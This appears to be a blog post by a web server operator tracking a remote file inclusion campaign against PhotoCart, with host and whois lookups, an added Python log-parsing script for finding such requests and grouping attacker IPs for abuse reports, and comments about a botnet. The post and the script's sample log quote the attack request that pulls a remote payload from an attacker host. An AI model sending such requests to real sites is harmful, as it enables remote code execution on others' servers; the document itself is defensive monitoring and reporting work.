The PhotoCart attackers regrouped quickly after their other compromised server was cleaned up and launched a new wave based on the file they are trying to upload being hosted within Layeredtech.
The file is now being referenced here:
"/PhotoCart/adminprint.php?path=http://artelj.com/c.ar?"
That's in the Layeredtech network somewhere:
host artelj.com has address 72.36.219.90
host 72.36.219.90 -> server2.soloymi.com.
whois 72.36.219.90
OrgName: Layered Technologies, Inc.
NetRange: 72.36.128.0 - 72.36.255.255
This game of cat and mouse is getting old, but if they want to keep playing then I'll keep getting their playgrounds closed one at a time.
The only upside today is the botnet that hit my server was much smaller than in the past and didn't include any IPs from theplanet.com, so perhaps they shut down those compromised locations. Will keep monitoring to see if theplanet.com IPs are used from this point forward to see if they resolved this or not.
Oh well, more letters to write to abuse@bunch-o-companies, sigh...
UPDATE: Looks like it might be the typical vulnerability hackers from Turkey as I caught them hitting my site looking for /PhotoCart/ using a Google INURL search.
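An added example, not part of the original post: one way to pull requests like the one quoted above out of a web server access log, grouping the client IPs by the host the remote file is served from so the abuse letters can be written per hosting company. The log lines are constructed samples in Apache combined format with documentation-range client IPs, and the function names are made up for this sketch.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (Apache combined format). Client IPs are
# documentation addresses; the request is the one quoted in the post.
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2007:10:00:01 +0000] "GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
198.51.100.7 - - [01/Jan/2007:10:00:03 +0000] "GET /PhotoCart/adminprint.php?path=http://artelj.com/c.ar? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
203.0.113.5 - - [01/Jan/2007:10:00:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2007:10:00:12 +0000] "GET /PhotoCart/adminprint.php?path=HTTP%3A%2F%2Fartelj.com%2Fc.ar%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
'''

# client IP and request target from a combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# a parameter value that is itself a remote URL
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)


def find_remote_includes(log_text):
    """Return {payload_host: {client_ips}} for requests whose query
    string carries a remote URL as a parameter value."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        # parse_qsl percent-decodes, so encoded variants are caught too
        for _name, value in parse_qsl(urlsplit(target).query,
                                      keep_blank_values=True):
            if REMOTE_RE.match(value.strip()):
                host = urlsplit(value.strip()).hostname
                if host:
                    hits[host].add(client)
    return hits


def abuse_summary(hits):
    """One (payload_host, sorted client IPs) entry per hosting target."""
    return [(host, sorted(ips)) for host, ips in sorted(hits.items())]


if __name__ == "__main__":
    for host, clients in abuse_summary(find_remote_includes(SAMPLE_LOG)):
        print(f"{host}: {len(clients)} client(s): {', '.join(clients)}")
```
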
3 comments:
The server seems already down (fortunately). However each of these hosts is also part of a botnet. Yesterday I did some research and the channel where the bots gather contained 383 members if I remember right - not counting me and the bot herder. Because they are mostly servers I assume that this is pretty much an accurate count. Unfortunately the clients log in as invisible, so I couldn't get host names. Anyone know how to circumvent this?
So you're saying there's 383 machines involved in this network?
That means I've only seen about half of it and hopefully a chunk of that will vanish tomorrow from all the AUP notices I sent today.
FYI, the server is still up at the moment, it's just getting some "Bandwidth Limit Exceeded" errors.
I've seen this before on other accounts these guys have used to host their files.